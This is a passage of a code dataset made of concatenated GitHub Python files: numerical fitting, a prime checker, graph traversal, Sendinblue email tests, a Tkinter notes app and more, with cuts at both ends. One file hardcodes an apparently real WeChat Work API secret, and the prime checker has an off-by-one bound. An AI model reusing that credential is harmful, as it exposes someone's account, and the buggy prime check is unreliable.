* sin4theta\n initpos = u_positions[0]\n\n mod_positions = u_positions[:6000]\n for t in range(1,n):\n v[t] = P_2(mod_positions,t) \n\n \n # Fit to sum of exponentials\n def exponential_model(t,tau1, tau2, tau3):\n return alpha1 * np.exp(-t/tau1) + alpha2 * np.exp(-t/tau2) + alpha3 * np.exp(-t/tau3)\n\n v_fit = v[1:] # fitting cutoffs \n def fitfun(taus):\n l = len(v_fit)\n s = 0.0\n for t in range(l):\n s += np.power(v_fit[t]-exponential_model(t*dt,taus[0],taus[1],taus[2]), 2)\n s /= l \n return np.sqrt(s)\n\n from scipy import optimize\n minimum = optimize.minimize(fitfun, [1e-7, 1e-7, 1e-7], method='Nelder-Mead', options={'xatol':1e-11})\n print('Parameters of minimization: {}'.format(minimum.x))\n print('Alphas: {}, {}, {}'.format(alpha1,alpha2,alpha3))\n # Make some magic pictures\n fig = plt.figure()\n ax = fig.add_subplot(111)\n final_taus = minimum.x\n xs = np.zeros(len(v_fit))\n fit_ys = np.zeros(len(v_fit))\n calc_ys = np.zeros(len(v_fit))\n for i,val in enumerate(v_fit):\n input_val = i * dt\n fit_ys[i] = exponential_model(input_val, final_taus[0], final_taus[1], final_taus[2])\n calc_ys[i] = val \n xs[i] = input_val \n ax.plot(xs, calc_ys, 'b', xs, fit_ys, 'r')\n plt.show()\n \n \n f = open('t_vs_p2.csv', 'w')\n f.write('time,p2\\n')\n for i,val in enumerate(v):\n f.write('{},{}\\n'.format(i*dt,val))\n f.close() \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"stationarysalesman/mister-disky","sub_path":"disky2.py","file_name":"disky2.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32670012618","text":"# Check Prime Number\nimport math\nimport random\n\n\ndef isPrime(n):\n print(\"n = \", n)\n sqrtN = int(math.sqrt(n))\n for i in range(2, sqrtN):\n if n % i == 0:\n print(\"i = \", i)\n return \"n is not prime\"\n return \"n is prime\"\n\n\nprint(isPrime(random.randrange(2, 32768)))\n","repo_name":"MinhoJJang/2023-first-semester","sub_path":"DataScience/Assignment/Week_01/isPrime.py","file_name":"isPrime.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37692581641","text":"from typing import Any\n\n__all__ = (\n 'Node',\n 'Graph'\n)\n\n\nclass Node:\n def __init__(self, value: Any):\n self.value = value\n\n self.outbound = []\n self.inbound = []\n\n def point_to(self, other: 'Node'):\n self.outbound.append(other)\n other.inbound.append(self)\n\n def __str__(self):\n return f'Node({repr(self.value)})'\n\n __repr__ = __str__\n\n\nclass Graph:\n def __init__(self, root: Node):\n self._root = root\n\n def dfs(self) -> list[Node]:\n def recursive_dfs(node, res):\n if node not in res:\n res.append(node)\n for other in node.outbound:\n recursive_dfs(other, res)\n return\n\n result = [self._root]\n for node in self._root.outbound:\n recursive_dfs(node, result)\n return result\n\n\n\n def bfs(self) -> list[Node]:\n result = []\n queue = [self._root]\n while queue:\n if queue[-1] not in result:\n node = queue.pop()\n result.append(node)\n queue = node.outbound[::-1] + queue\n else:\n queue.pop()\n\n return result\n","repo_name":"eprush/hw-backend-summer-2023-1-algorithms","sub_path":"tasks/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16293257724","text":"def get_days_in_month(month, year):\n\tif month in [4,6,9,11]:\n\t\treturn 
30\n\telif month == 2:\n\t\tif year % 4 == 0:\n\t\t\tif year % 100 == 0 and year % 400 != 0:\n\t\t\t\treturn 28\n\t\t\treturn 29\n\t\telse:\n\t\t\treturn 28\n\telse:\n\t\treturn 31\n\n# Week starts on sunday = 0\nmonth_start_day = (1 + 365) % 7 # Initialize by knowing: 1 Jan 1900 was a Monday\nmonth = 1\nyear = 1901\n\ncount = 0\ndays_in_month = 0\nwhile year < 2001:\n\tmonth = 1\n\twhile month < 13:\n\t\t# Check this month start day\n\t\tif month_start_day == 0:\n\t\t\tcount += 1\n\n\t\t# Set up next month\n\t\tmonth_start_day = (month_start_day + get_days_in_month(month, year)) % 7\n\t\tmonth += 1\n\n\tyear += 1\n\nprint(count)","repo_name":"sabaduy/ProjectEuler","sub_path":"python/0019.py","file_name":"0019.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39164027705","text":"import cassandra.cluster\nimport generator\nfrom cql_utils import *\n\nc = cassandra.cluster.Cluster(['localhost'])\nks = c.connect('chembise_metar_1_12')\n\ndata = generator.loadata()\n\ni = 0\nfor row in data:\n i = i + 1\n if (i % 1000) == 0:\n print(i)\n row = split_daytime(row)\n query = format_insert_query(\"date_by_location\", row)\n\n ks.execute(query)\n","repo_name":"danousna/metar","sub_path":"insert-data.py","file_name":"insert-data.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"20663318670","text":"import os\nimport glob\nimport argparse\n\nimport pandas as pd\nimport torch\n\nfrom utils.objdict import ObjDict\nfrom utils.mkdir_p import mkdir_p\n\nnext_line = '\\n'\nsaved_label_key = \"pred_ids\"\nof_mapping_key = \"overflow_mapping\"\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('input_path',type=str)\n parser.add_argument('--write_dataset_only',action='store_true')\n parser.add_argument('--add_id',action='store_true')\n return parser.parse_args()\n\ndef convert_ids_to_string(cfg,device='cuda',out_str='pred_str.txt',write_dataset_only=False,add_id=False):\n pp = cfg.pipeline\n out_dict = {}\n checkpts = pp.get_model_checkpts(cfg.extract_cfg.model_dir,cfg.extract_cfg.model_key)\n if add_id:\n textids = pd.read_csv(cfg.preprocess_cfg.test_csv_path).id\n \n outfile = open(os.path.join(cfg.extract_cfg.output_dir,out_str),\"w\")\n checkpts.sort()\n for c in checkpts:\n print(\"Processing checkpoint \"+c)\n outfile.write(\"*\"*100+next_line)\n outfile.write(c+next_line)\n outfile.write(\"*\"*100+next_line)\n cdir = os.path.join(cfg.extract_cfg.output_dir,c)\n if not os.path.exists(cdir):\n print(cdir+\" not exist\")\n continue\n fs = [f for f in os.listdir(cdir) if \".pt\" in f]\n fs.sort()\n if not fs:\n print(\"empty folder: {}, skipping\".format(c))\n continue\n pred_ids = torch.cat([torch.load(os.path.join(cdir,f)) for f in fs if saved_label_key in f])\n if add_id:\n ids = torch.cat([torch.load(os.path.join(cdir,f)) for f in fs if of_mapping_key in f])\n pred_ids[pred_ids==-1] = 0\n if write_dataset_only:\n pred_idx = torch.sum(pred_ids,axis=1)!=0\n pred_ids = pred_ids[pred_idx]\n ids = ids[pred_idx]\n pp.print_message(c)\n\n strs = cfg.tokenizer.batch_decode(pred_ids,skip_special_tokens=True)\n if add_id:\n outfile.write(next_line.join([str(textids[int(ids[i])])+\": \"+str(i)+\", \"+s for i,s in enumerate(strs) if s]))\n else:\n outfile.write(next_line.join([str(i)+\", \"+s for i,s in enumerate(strs) if s]))\n outfile.write(next_line)\n 
outfile.close()\n\nif __name__ == \"__main__\":\n\n args = parse_arguments()\n\n if \"*\" in args.input_path:\n paths = glob.glob(args.input_path)\n else:\n paths = args.input_path.split(\",\")\n\n assert len(paths) > 0\n \n cfgs = [ObjDict.read_all_from_file_python3(p) for p in paths]\n assert all([hasattr(c,\"plot_label\",) for c in cfgs])\n \n data = {}\n for c in cfgs:\n convert_ids_to_string(c,write_dataset_only=args.write_dataset_only,add_id=args.add_id) \n","repo_name":"lucien1011/kaggle-coleridgeinitiative-show-us-the-data","sub_path":"postprocessing/make_text_from_saved_ids.py","file_name":"make_text_from_saved_ids.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40773490289","text":"import os\nimport unittest\nfrom datetime import datetime, timedelta\nfrom email.utils import formataddr\n\nfrom django.test import SimpleTestCase, override_settings, tag\n\nfrom anymail.exceptions import AnymailAPIError\nfrom anymail.message import AnymailMessage\n\nfrom .utils import AnymailTestMixin\n\nANYMAIL_TEST_SENDINBLUE_API_KEY = os.getenv(\"ANYMAIL_TEST_SENDINBLUE_API_KEY\")\nANYMAIL_TEST_SENDINBLUE_DOMAIN = os.getenv(\"ANYMAIL_TEST_SENDINBLUE_DOMAIN\")\n\n\n@tag(\"sendinblue\", \"live\")\n@unittest.skipUnless(\n ANYMAIL_TEST_SENDINBLUE_API_KEY and ANYMAIL_TEST_SENDINBLUE_DOMAIN,\n \"Set ANYMAIL_TEST_SENDINBLUE_API_KEY and ANYMAIL_TEST_SENDINBLUE_DOMAIN \"\n \"environment variables to run SendinBlue integration tests\",\n)\n@override_settings(\n ANYMAIL_SENDINBLUE_API_KEY=ANYMAIL_TEST_SENDINBLUE_API_KEY,\n ANYMAIL_SENDINBLUE_SEND_DEFAULTS=dict(),\n EMAIL_BACKEND=\"anymail.backends.sendinblue.EmailBackend\",\n)\nclass SendinBlueBackendIntegrationTests(AnymailTestMixin, SimpleTestCase):\n \"\"\"SendinBlue v3 API integration tests\n\n SendinBlue doesn't have sandbox so these tests run\n against the **live** SendinBlue API, using the\n environment variable `ANYMAIL_TEST_SENDINBLUE_API_KEY` as the API key,\n and `ANYMAIL_TEST_SENDINBLUE_DOMAIN` to construct sender addresses.\n If those variables are not set, these tests won't run.\n\n https://developers.sendinblue.com/docs/faq#section-how-can-i-test-the-api-\n\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.from_email = \"from@%s\" % ANYMAIL_TEST_SENDINBLUE_DOMAIN\n self.message = AnymailMessage(\n \"Anymail SendinBlue integration test\",\n \"Text content\",\n self.from_email,\n [\"test+to1@anymail.dev\"],\n )\n self.message.attach_alternative(\"
<p>HTML content</p>
    \", \"text/html\")\n\n def test_simple_send(self):\n # Example of getting the SendinBlue send status and message id from the message\n sent_count = self.message.send()\n self.assertEqual(sent_count, 1)\n\n anymail_status = self.message.anymail_status\n sent_status = anymail_status.recipients[\"test+to1@anymail.dev\"].status\n message_id = anymail_status.recipients[\"test+to1@anymail.dev\"].message_id\n\n self.assertEqual(sent_status, \"queued\") # SendinBlue always queues\n # Message-ID can be ...@smtp-relay.mail.fr or .sendinblue.com:\n self.assertRegex(message_id, r\"\\<.+@.+\\>\")\n # set of all recipient statuses:\n self.assertEqual(anymail_status.status, {sent_status})\n self.assertEqual(anymail_status.message_id, message_id)\n\n def test_all_options(self):\n send_at = datetime.now() + timedelta(minutes=2)\n message = AnymailMessage(\n subject=\"Anymail SendinBlue all-options integration test\",\n body=\"This is the text body\",\n from_email=formataddr((\"Test From, with comma\", self.from_email)),\n to=[\"test+to1@anymail.dev\", '\"Recipient 2, OK?\" '],\n cc=[\"test+cc1@anymail.dev\", \"Copy 2 \"],\n bcc=[\"test+bcc1@anymail.dev\", \"Blind Copy 2 \"],\n # SendinBlue API v3 only supports single reply-to\n reply_to=['\"Reply, with comma\" '],\n headers={\"X-Anymail-Test\": \"value\", \"X-Anymail-Count\": 3},\n metadata={\"meta1\": \"simple string\", \"meta2\": 2},\n send_at=send_at,\n tags=[\"tag 1\", \"tag 2\"],\n )\n # SendinBlue requires an HTML body:\n message.attach_alternative(\"
<p>HTML content</p>
    \", \"text/html\")\n\n message.attach(\"attachment1.txt\", \"Here is some\\ntext for you\", \"text/plain\")\n message.attach(\"attachment2.csv\", \"ID,Name\\n1,Amy Lina\", \"text/csv\")\n\n message.send()\n # SendinBlue always queues:\n self.assertEqual(message.anymail_status.status, {\"queued\"})\n self.assertRegex(message.anymail_status.message_id, r\"\\<.+@.+\\>\")\n\n def test_template(self):\n message = AnymailMessage(\n # There is a *new-style* template with this id in the Anymail test account:\n template_id=5,\n # Override template sender:\n from_email=formataddr((\"Sender\", self.from_email)),\n # No batch send (so max one recipient suggested):\n to=[\"Recipient \"],\n reply_to=[\"Do not reply \"],\n tags=[\"using-template\"],\n headers={\"X-Anymail-Test\": \"group: A, variation: C\"},\n merge_global_data={\n # The Anymail test template includes `{{ params.SHIP_DATE }}`\n # and `{{ params.ORDER_ID }}` substitutions\n \"SHIP_DATE\": \"yesterday\",\n \"ORDER_ID\": \"12345\",\n },\n metadata={\"customer-id\": \"ZXK9123\", \"meta2\": 2},\n )\n\n # Normal attachments don't work with Brevo templates:\n # message.attach(\"attachment1.txt\", \"Here is some\\ntext\", \"text/plain\")\n # If you can host the attachment content on some publicly-accessible URL,\n # this *non-portable* alternative allows sending attachments with templates:\n message.esp_extra = {\n \"attachment\": [\n {\n \"name\": \"attachment1.txt\",\n # URL where Brevo can download the attachment content while\n # sending (must be content-type: text/plain):\n \"url\": \"https://raw.githubusercontent.com/anymail/django-anymail/\"\n \"main/docs/_readme/template.txt\",\n }\n ]\n }\n\n message.send()\n # SendinBlue always queues:\n self.assertEqual(message.anymail_status.status, {\"queued\"})\n self.assertRegex(message.anymail_status.message_id, r\"\\<.+@.+\\>\")\n\n @override_settings(ANYMAIL_SENDINBLUE_API_KEY=\"Hey, that's not an API key!\")\n def test_invalid_api_key(self):\n with self.assertRaises(AnymailAPIError) as cm:\n self.message.send()\n err = cm.exception\n self.assertEqual(err.status_code, 401)\n # Make sure the exception message includes SendinBlue's response:\n self.assertIn(\"Key not found\", str(err))\n","repo_name":"anymail/django-anymail","sub_path":"tests/test_sendinblue_integration.py","file_name":"test_sendinblue_integration.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":1517,"dataset":"github-code","pt":"39"} +{"seq_id":"15693931589","text":"class Solution:\n \"\"\"\n 给定一个整数数组 nums ,找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和\n 主要思想,只有当sum[:i]-sum[:j]>0的时候,才会对最大和有帮助\n\n [num[0], num[1],......num[i]......num[n-1]]\n 动态规划的是首先对数组进行遍历,当前位置i最大连续子序列和为 sum,sum起始值为0,历史最大子序列结果为 ans,ans起始值为num[0]\n 如果 sum > 0,则说明 sum 对结果有增益效果,则 sum 保留并加上当前遍历数字\n 如果 sum <= 0,则说明 sum 对结果无增益效果,需要舍弃,则 sum 直接更新为当前遍历数字\n 每次比较 当前sum 和 历史ans的大小,将最大值置为ans,继续往后遍历,遍历结束返回结果\n 时间复杂度:O(n)\n \"\"\"\n @staticmethod\n def max_sub_array(nums):\n sum = 0\n history_max_sum = nums[0]\n for num in nums:\n if sum > 0:\n sum += num\n else:\n sum = num\n print(\"历史最大值以及当前最大值:\",history_max_sum,sum)\n history_max_sum = max(history_max_sum,sum)\n return history_max_sum\n\n def maxSubArray(nums):\n pre_sum = 0\n ans = nums[0]\n for num in nums:\n pre_sum = max(pre_sum+num, num)\n print(pre_sum,ans)\n ans = max(pre_sum,ans)\n return ans\n\nif __name__ == \"__main__\":\n nums = [-2,1,-3,4,-1,2,1,-5,4]\n result = Solution.max_sub_array(nums)\n print(\"The max su array is:\", 
result)\n\n\n\n\n","repo_name":"tinghe0928/leetcode","sub_path":"sliding_window/max_sub_array.py","file_name":"max_sub_array.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25599571509","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 23 17:41:00 2018\n\n@author: bencooper\n\"\"\"\n\nimport os\n\nclass DirGen:\n @staticmethod\n def create_dir(path):\n if os.path.isdir(path) == False:\n os.makedirs(path)\n ","repo_name":"cooperb0199/TSForecasting","sub_path":"utils/dir_generator.py","file_name":"dir_generator.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"9147523534","text":"#!/usr/bin/env python\n\n#figure parameter set up\nimport matplotlib.pyplot as plt\nplt.rcParams['figure.dpi'] = 100\nplt.rcParams[\"figure.figsize\"] = [15.0, 6.0]\n# %config InlineBackend.figure_format = 'svg'\n# %matplotlib inline\n\nimport pandas as pd\n\ntotal_match = pd.read_csv('vis_results/total_match.csv', sep = ',')\n\nno_prediction = pd.read_csv('vis_results/no_prediction.csv', sep = ',')\n\nno_prediction_but_E = pd.read_csv('vis_results/no_prediction_but_enzyme.csv', sep = ',')\n\n\nnon_enzyme_correct = pd.read_csv('vis_results/non_enzyme_correct.csv', sep = ',')\n\nPNEBE = pd.read_csv('vis_results/predicted_non_enzyme_but_enzyme.csv', sep = ',')\n\n\nPEBnonE = pd.read_csv('vis_results/predicted_enzyme_but_non_enzyme', sep = ',')\n\ntotal_correct = pd.read_csv('vis_results/correct_to_fourth_digit.csv', sep = ',')\n\n\nthird_digit_correct = pd.read_csv('vis_results/correct_to_third_digit.csv', sep = ',')\n\n\nsecond_digit_correct = pd.read_csv('vis_results/correct_to_second_digit.csv', sep = ',')\n\n\nfirst_digit_correct = pd.read_csv('vis_results/correct_to_first_digit.csv', sep = ',')\n\nfirst_digit_wrong = pd.read_csv('vis_results/first_digit_wrong.csv', sep = ',')\n\ndf_EC = pd.read_csv('vis_results/df_EC.csv', sep = ',')\n\nimport matplotlib.pyplot as plt\n\n\n\ndataframes = [no_prediction,\n PNEBE,\n PEBnonE,\n non_enzyme_correct,\n total_match,\n third_digit_correct,\n second_digit_correct,\n first_digit_correct,\n first_digit_wrong]\n\n\n\nlengths = [len(i) for i in dataframes[0:4]]\ndigits = [len(i) for i in dataframes[4:]]\nlengths.append(sum(digits))\n\npercent_lengths = [i/sum(lengths) for i in lengths]\n\npercent_digits = [i/sum(digits) for i in digits]\n\nbarwidth = 1\n\n\n# create data\nx = ['ECpred \\noverall \\nperformance']\n\n\nlabel_list_lengths = ['No Prediction',\n 'Predicted Non-Enzyme but Enzyme',\n 'Predicted Enzyme but non-Enzyme',\n 'Non Enzyme Correct',\n 'Predicted EC number'] \n\n\ny1 = percent_lengths[4]\ny2 = percent_lengths[3]\ny3 = percent_lengths[2]\ny4 = percent_lengths[1]\ny5 = percent_lengths[0]\n\ncolor = ['b','c','y','g','r']\n# plot bars in stack manner\nplt.bar(x, y1, color= 'b')#color[0])\nplt.bar(x, y2, bottom=y1, color='c')\nplt.bar(x, y3, bottom=y1+y2, color='y')\nplt.bar(x, y4, bottom=y1+y2+y3, color= 'g')\nplt.bar(x, y5, bottom= y1+y2+y3+y4, color = 'r')#'#ff9500')\nplt.legend(label_list_lengths[::-1], bbox_to_anchor=(1.5,1.5), ncol=5,loc='center')\n\n# create data\nx = ['ECpred \\ndigits']\n\n\n\nlabel_list_digits = ['Total correct',\n 'third digit correct',\n 'second digit correct',\n 'first digit correct',\n 'first digit wrong']\n\n\ny1 = percent_digits[0]\ny2 = percent_digits[1]\ny3 = percent_digits[2]\ny4 = 
percent_digits[3]\ny5 = percent_digits[4]\n \n# plot bars in stack manner\ncolors = ['#377697','#4fa9d9','#72bae0','#a7d4ec','#fdab91']\nplt.rcParams[\"figure.figsize\"] = [5,5]\nplt.bar(x, y1, color= colors[0])#, width = barwidth)\nplt.bar(x, y2, bottom=y1, color = colors[1])#, width = barwidth), width = barwidth)\nplt.bar(x, y3, bottom=y1+y2,color = colors[2])#, width = barwidth), width = barwidth)\nplt.bar(x, y4, bottom=y1+y2+y3, color = colors[3])#, width = barwidth), width = barwidth)\nplt.bar(x, y5, bottom= y1+y2+y3+y4, color = colors[4])#, width = barwidth), width = barwidth)\n\n\n\nplt.ylabel(\"Fraction of the Whole\")\nplt.legend(label_list_digits, bbox_to_anchor=(1.5,1.5), ncol=5,loc='center')\n\nplt.savefig('vis_results/overall_performance.png', format='png', dpi=800)\n\nprint('all done')","repo_name":"Sakib1418/Benchmarking-Enzyme-Classifiers","sub_path":"visualization/overall_performance.py","file_name":"overall_performance.py","file_ext":"py","file_size_in_byte":3660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"1049945562","text":"\"\"\"Here you will find functions for getting rid of the same data points.\"\"\"\nfrom math import inf\nimport numpy as np\n\n\ndef dedup(x, y):\n\t\"\"\"Deduplicate the arguments for fitting.\n\t\n\tArgs:\n\t\tx (iterable): values to dedup.\n\t\ty (iterable): corresponding values.\n\tReturns:\n\t\ttuple with values from the input, but retaining only the first\n\t\tamong the repeating ones.\n\t\"\"\"\n\tx1 = []\n\ty1 = []\n\tXprev = -inf\n\tfor X,Y in zip(x,y):\n\t\tif X > Xprev:\n\t\t\tx1.append(X)\n\t\t\ty1.append(Y)\n\t\tXprev = X\n\treturn x1, y1\n\n\ndef dedup_np(x,y):\n\t\"\"\"Deduplicate the arguments for fitting.\n\t\n\tMuch faster then dedup.\n\n\tArgs:\n\t\tx (np.array): values to dedup.\n\t\ty (np.array): corresponding values.\n\tReturns:\n\t\ttuple with values from the input, but retaining only the first\n\t\tamong the repeating ones.\n\t\"\"\"\n\to = np.full(x.shape, True)\n\to[1:] = np.diff(x) > 0\n\treturn x[o], y[o]\n\n\n","repo_name":"MatteoLacki/rta","sub_path":"rta/array_operations/dedupy.py","file_name":"dedupy.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"27870485744","text":"import requests\n\n\ndef test_request():\n url = 'http://httpbin.org/get'\n payload = {'key1':'value1','key2':['value2', 'value3']}\n r = requests.get(url,params = payload)\n print(r)\n\n with open('','r',encoding='utf-8') as f:\n file = f.read()\n\ndef test_request1():\n id = 'wwdae6409305b8bd0c'\n select = 'yfVfCz4aehQ1etcO9Rqh9lx9GPpdcjute5Zyi9w8ZO0'\n url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'\n header ={'corpid':'wwdae6409305b8bd0c',\n 'corpsecret':'yfVfCz4aehQ1etcO9Rqh9lx9GPpdcjute5Zyi9w8ZO0'}\n #r =requests.get(url,headers=headers)\n\n r = requests.get(url,params=header)\n print(r.json())\n token = r.json()['access_token']\n print(token)\n with open('token.yaml','w',encoding='UTF-8') as f:\n f.write(token)\n\n\n\n\n\n","repo_name":"zhuanfang/python","sub_path":"file/从零学Python/day06/requests_use.py","file_name":"requests_use.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32421586302","text":"import matplotlib.pyplot as plt\nimport random\n\ndef createPlot() :\n # Générer des données aléatoires\n\n plt.clf()\n\n nombre_requetes = 100\n temps = 
list(range(nombre_requetes))\n valeurs = [random.randint(0, 100) for _ in range(nombre_requetes)]\n\n # Créer le graphique\n plt.plot(temps, valeurs)\n plt.xlabel('Temps')\n plt.ylabel('Nombre de requêtes')\n\n # Sauvegarder le graphique au format JPEG\n plt.savefig('static/img/graphique.jpg', format='jpeg')","repo_name":"pleijan/AwareNet","sub_path":"CreatePlot.py","file_name":"CreatePlot.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31927559884","text":"import random\n\nclass Rational:\n def __init__(self, num, den):\n self.num = num\n self.den = den\n \n def mul(self, other):\n if isinstance(other, Rational):\n num = self.num * other.num\n den = self.den * other.den\n return Rational(num, den)\n elif isinstance(other, int):\n num = self.num * other\n return Rational(num, self.den)\n else:\n raise TypeError(\"Unsupported operand type(s) for *: '{}' and '{}'\".format(type(self), type(other)))\n \n def truediv(self, other):\n if isinstance(other, Rational):\n num = self.num * other.den\n den = self.den * other.num\n return Rational(num, den)\n elif isinstance(other, int):\n den = self.den * other\n return Rational(self.num, den)\n else:\n raise TypeError(\"Unsupported operand type(s) for /: '{}' and '{}'\".format(type(self), type(other)))\n \n @staticmethod\n def random_fraction(low, high):\n num = random.randint(low, high)\n den = random.randint(low, high)\n while den == 0:\n den = random.randint(low, high)\n return Rational(num, den)","repo_name":"NikitaKurganovich/BSUIR","sub_path":"MPL/Lab/Lab3/Part 1/Rational.py","file_name":"Rational.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17707724767","text":"from tkinter import *\nfrom tkinter import messagebox\nimport json\nimport os\nfrom notes import notes\n\n\ndef registration_successfully_completed():\n btn.destroy()\n global folder_name\n lbl = Label(root, text='Приветствуем вас {}, авторизация успешно пройдена!!'.format(txt.get()))\n lbl.grid(column=0, row=0)\n folder_name = txt.get()\n txt.delete('0', END)\n txt.destroy()\n try:\n os.mkdir(f'{folder_name}')\n label = Label(root, text='Под вашим никнеймом предыдущих заметок не обнаружено')\n label.grid(column=0, row=2)\n button = Button(root, text=\"Создать новую заметку!\", command=go_in_notes)\n button.grid(column=0, row=3)\n except:\n found_old_files(folder_name)\n\n\ndef go_in_notes():\n notes(folder_name)\n\n\ndef found_old_files(entered_text):\n otvet = []\n row = 1\n try:\n for filename in os.listdir(f'{entered_text}'):\n with open(os.path.join(f'{entered_text}', filename), 'r') as file:\n text = file.read()\n found_files = (filename, 'с текстом:', text)\n otvet.append(found_files)\n label = Label(root, text='Под вашим никнеймом обнаружены следующие файлы:')\n label.grid(column=0, row=1)\n for i in range(len(otvet)):\n row += 1\n label = Label(root, text=f'{otvet[i][0]}' + ':' + ' ' + f'{otvet[i][2]}')\n label.grid(column=0, row=row)\n button = Button(root, text=\"Создать новую заметку!\", command=go_in_notes)\n button.grid(column=0, row=row + 1)\n except:\n return False\n\n\ndef user_registration():\n data = json.dumps(txt.get(), ensure_ascii=False)\n data = json.loads(str(data))\n\n with open('data.json', 'r') as filik:\n dict_data = json.load(filik)\n dict_data[f'{txt.get()}'] = ['авторизация успешно пройдена']\n\n with open('data.json', 'w') as file:\n 
json.dump(dict_data, file, ensure_ascii=False, indent=3)\n registration_successfully_completed()\n\n\ndef check_for_saved_users():\n with open('data.json', 'r') as file:\n a = file.read()\n a = json.loads(a)\n check = 0\n for element in a:\n if element == txt.get():\n registration_successfully_completed()\n break\n if element != txt.get():\n check += 1\n if check == len(a):\n user_registration()\n\n\nroot = Tk()\nroot.title('Авторизация в заметки')\nroot.geometry('450x450')\n\nmenu_bar = Menu(root)\nfile_menu = Menu(menu_bar)\n\nmessagebox.showinfo('Информация',\n 'Привет, вам нужно будет ввести ваш персональный никнейм, это нужно для предоставления именно ваших заметок!')\nlbl = Label(root, text='Введите свой никнейм!')\nlbl.grid(column=0, row=0)\ntxt = Entry(root, width=15)\ntxt.grid(column=1, row=0)\ntxt.focus()\nbtn = Button(root, text=\"ОК!\", command=check_for_saved_users)\nbtn.grid(column=2, row=2)\n\nroot.config(menu=menu_bar)\nroot.mainloop()\n","repo_name":"AppleIpx/python-notes","sub_path":"functions_for_the_notes.py","file_name":"functions_for_the_notes.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"45749032740","text":"import graphene\nimport graphql_jwt\n\n# import links.schema\n# import links.schema_relay\nimport users.schema\nimport rooms.schema\nimport msgs.schema\n\nclass Query(\n users.schema.Query,\n rooms.schema.Query,\n msgs.schema.Query,\n # links.schema.Query,\n # links.schema_relay.RelayQuery,\n graphene.ObjectType,\n):\n pass\n\n\nclass Mutation(\n users.schema.Mutation,\n rooms.schema.Mutation,\n msgs.schema.Mutation,\n # links.schema.Mutation,\n # links.schema_relay.RelayMutation,\n graphene.ObjectType,\n):\n\n login = graphql_jwt.ObtainJSONWebToken.Field()\n verify_token = graphql_jwt.Verify.Field()\n refresh_token = graphql_jwt.Refresh.Field()\n\n\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"rajzik/docker-webapp","sub_path":"server/webapp/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27144460030","text":"#!/usr/bin/env python\n\nimport argparse\nimport csv\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.style.use('dark_background')\n\ndef read_csv(filename, has_header=True):\n rows = []\n with open(filename, 'r') as f:\n reader = csv.reader(f, delimiter=',')\n if has_header:\n header = tuple(map(str.rstrip, next(reader)))\n for line in reader:\n rows.append(tuple(map(float, line)))\n if not has_header:\n header = ('',) * len(rows[0])\n return header, rows\n\ndef read_gnuplot(filename):\n rows = []\n with open(filename, 'r') as f:\n for line in f:\n split_line = line.split()\n rows.append(tuple(map(float, split_line)))\n return [''] * len(rows[0]), rows\n\ndef plot_time_series(csv_filename, out_filename, ylim=None, title=None,\n ticks=None, nrows=1, case=''):\n styles = [\n {'color': '#00ffff', 'linewidth': 2},\n {'color': '#ff00ff', 'linewidth': 2},\n {'color': '#00cfcf', 'linewidth': 2},\n {'color': '#cf00cf', 'linewidth': 2},\n {'color': '#00afaf', 'linewidth': 2},\n {'color': '#af00af', 'linewidth': 2},\n {'color': '#008f8f', 'linewidth': 2},\n {'color': '#8f008f', 'linewidth': 2},\n {'color': '#006f6f', 'linewidth': 2},\n {'color': '#6f006f', 'linewidth': 2},\n ]\n header, rows = read_csv(csv_filename)\n series = list(map(np.array, zip(*rows)))\n t = series[0]\n\n if 
